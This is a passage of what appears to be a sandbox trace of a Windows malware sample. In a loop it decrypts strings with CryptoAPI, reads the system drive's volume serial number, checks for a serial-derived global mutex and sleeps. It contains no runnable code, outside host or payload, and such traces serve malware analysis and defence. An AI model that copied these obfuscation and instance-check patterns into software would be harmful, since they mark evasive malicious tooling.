dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0042.491] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871720 | out: hHeap=0x870000) returned 1 [0042.491] Sleep (dwMilliseconds=0x3e8) [0043.503] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0043.503] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0043.503] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0043.503] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0043.503] CryptDestroyKey (hKey=0x22b630) returned 1 [0043.503] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0043.503] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0043.503] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0043.504] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0043.504] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0043.504] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0043.504] CryptDestroyKey (hKey=0x22b630) returned 1 [0043.504] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0043.504] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0043.504] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0043.504] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0043.504] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0043.504] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0043.504] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716d8 [0043.504] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0043.504] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0043.504] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefe18 | out: pbData=0x8716d8, pdwDataLen=0xaefe18) returned 1 [0043.504] CryptDestroyKey (hKey=0x22b630) returned 1 [0043.504] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871720 [0043.504] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0043.504] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0043.504] CloseHandle (hObject=0x14c) returned 1 [0043.504] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0043.504] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871720 | out: hHeap=0x870000) returned 1 [0043.505] Sleep (dwMilliseconds=0x3e8) [0044.518] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0044.519] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0044.519] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0044.519] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0044.519] CryptDestroyKey (hKey=0x22b630) returned 1 [0044.519] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0044.519] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0044.519] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0044.519] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0044.519] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0044.519] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0044.519] CryptDestroyKey (hKey=0x22b630) returned 1 [0044.519] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0044.519] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.519] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0044.519] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0044.519] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.519] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0044.519] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716d8 [0044.519] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0044.519] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0044.519] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefe18 | out: pbData=0x8716d8, pdwDataLen=0xaefe18) returned 1 [0044.519] CryptDestroyKey (hKey=0x22b630) returned 1 [0044.519] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871720 [0044.519] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0044.520] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0044.520] CloseHandle (hObject=0x14c) returned 1 [0044.520] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0044.520] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871720 | out: hHeap=0x870000) returned 1 [0044.520] Sleep (dwMilliseconds=0x3e8) [0047.786] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0047.786] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0047.786] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0047.786] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0047.786] CryptDestroyKey (hKey=0x22b630) returned 1 [0047.786] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0047.786] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0047.786] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0047.786] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0047.786] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0047.786] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0047.786] CryptDestroyKey (hKey=0x22b630) returned 1 [0047.786] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0047.786] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0047.786] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0047.786] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0047.786] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0047.787] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0047.787] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x8716d8 [0047.787] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0047.787] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0047.787] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefe18 | out: pbData=0x8716d8, pdwDataLen=0xaefe18) returned 1 [0047.787] CryptDestroyKey (hKey=0x22b630) returned 1 [0047.787] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x871720 [0047.787] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0047.787] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0047.787] CloseHandle (hObject=0x14c) returned 1 [0047.787] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0047.787] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871720 | out: hHeap=0x870000) returned 1 [0047.787] Sleep (dwMilliseconds=0x3e8) [0052.217] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0052.218] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0052.218] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0052.218] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0052.218] CryptDestroyKey (hKey=0x22b630) returned 1 [0052.218] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0052.218] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0052.218] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0052.218] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0052.218] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0052.218] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0052.218] CryptDestroyKey (hKey=0x22b630) returned 1 [0052.218] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0052.218] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0052.218] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0052.218] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0052.218] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.219] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0052.219] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x75bf68 [0052.219] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0052.219] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0052.219] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x75bf68, pdwDataLen=0xaefe18 | out: pbData=0x75bf68, pdwDataLen=0xaefe18) returned 1 [0052.219] CryptDestroyKey (hKey=0x22b630) returned 1 [0052.219] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x8716d8 [0052.219] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0052.219] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0052.219] CloseHandle (hObject=0x14c) returned 1 [0052.219] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x75bf68 | out: hHeap=0x870000) returned 1 [0052.220] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0052.220] Sleep (dwMilliseconds=0x3e8) [0054.532] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0054.532] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0054.532] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0054.532] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0054.532] CryptDestroyKey (hKey=0x22b630) returned 1 [0054.532] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0054.532] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0054.532] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0054.532] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0054.532] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0054.532] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0054.533] CryptDestroyKey (hKey=0x22b630) returned 1 [0054.533] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0054.533] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0054.533] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0054.533] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0054.533] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0054.533] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0054.533] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x75bf68 [0054.533] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0054.533] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0054.533] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x75bf68, pdwDataLen=0xaefe18 | out: pbData=0x75bf68, pdwDataLen=0xaefe18) returned 1 [0054.533] CryptDestroyKey (hKey=0x22b630) returned 1 [0054.533] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x8716d8 [0054.533] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0054.533] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0054.533] CloseHandle (hObject=0x14c) returned 1 [0054.533] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x75bf68 | out: hHeap=0x870000) returned 1 [0054.533] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0054.533] Sleep (dwMilliseconds=0x3e8) [0058.206] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0058.206] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0058.206] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0058.206] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0058.207] CryptDestroyKey (hKey=0x22b630) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0058.207] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0058.207] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0058.207] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0058.207] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0058.207] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0058.207] CryptDestroyKey (hKey=0x22b630) returned 1 [0058.207] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0058.207] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0058.207] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0058.207] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0058.207] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0058.207] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x75bf68 [0058.207] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0058.207] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0058.207] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x75bf68, pdwDataLen=0xaefe18 | out: pbData=0x75bf68, pdwDataLen=0xaefe18) returned 1 [0058.207] CryptDestroyKey (hKey=0x22b630) returned 1 [0058.207] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x8716d8 [0058.207] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0058.208] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0058.208] CloseHandle (hObject=0x14c) returned 1 [0058.208] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x75bf68 | out: hHeap=0x870000) returned 1 [0058.208] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0058.208] Sleep (dwMilliseconds=0x3e8) [0064.762] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x20) returned 0x8716d8 [0064.762] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdc8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe30 | out: phKey=0xaefe30*=0x22b630) returned 1 [0064.762] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe18, dwFlags=0x0) returned 1 [0064.762] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8716d8, pdwDataLen=0xaefde4 | out: pbData=0x8716d8, pdwDataLen=0xaefde4) returned 1 [0064.762] CryptDestroyKey (hKey=0x22b630) returned 1 [0064.762] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x1e) returned 0x871700 [0064.762] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x1e) returned 0x871728 [0064.762] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x90) returned 0x8756c0 [0064.762] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefda0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe08 | out: phKey=0xaefe08*=0x22b630) returned 1 [0064.762] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefdf0, dwFlags=0x0) returned 1 [0064.762] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8756c0, pdwDataLen=0xaefdbc | out: pbData=0x8756c0, pdwDataLen=0xaefdbc) returned 1 [0064.762] CryptDestroyKey (hKey=0x22b630) returned 1 [0064.762] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8756c0 | out: hHeap=0x870000) returned 1 [0064.762] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x871700, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0064.762] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871728 | out: hHeap=0x870000) returned 1 [0064.762] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0064.763] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0xaefe70, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0xaefe70*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0064.763] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x871700 | out: hHeap=0x870000) returned 1 [0064.763] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x0, Size=0x40) returned 0x75bf68 [0064.763] CryptImportKey (in: hProv=0x224fe0, pbData=0xaefdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0xaefe64 | out: phKey=0xaefe64*=0x22b630) returned 1 [0064.763] CryptSetKeyParam (hKey=0x22b630, dwParam=0x1, pbData=0xaefe4c, dwFlags=0x0) returned 1 [0064.763] CryptDecrypt (in: hKey=0x22b630, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x75bf68, pdwDataLen=0xaefe18 | out: pbData=0x75bf68, pdwDataLen=0xaefe18) returned 1 [0064.763] CryptDestroyKey (hKey=0x22b630) returned 1 [0064.763] RtlAllocateHeap (HeapHandle=0x870000, Flags=0x8, Size=0x34) returned 0x8716d8 [0064.763] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x14c [0064.763] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0064.763] CloseHandle (hObject=0x14c) returned 1 [0064.763] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x75bf68 | out: hHeap=0x870000) returned 1 [0064.763] HeapFree (in: hHeap=0x870000, dwFlags=0x0, lpMem=0x8716d8 | out: hHeap=0x870000) returned 1 [0064.763] Sleep (dwMilliseconds=0x3e8) Thread: id = 7 os_tid = 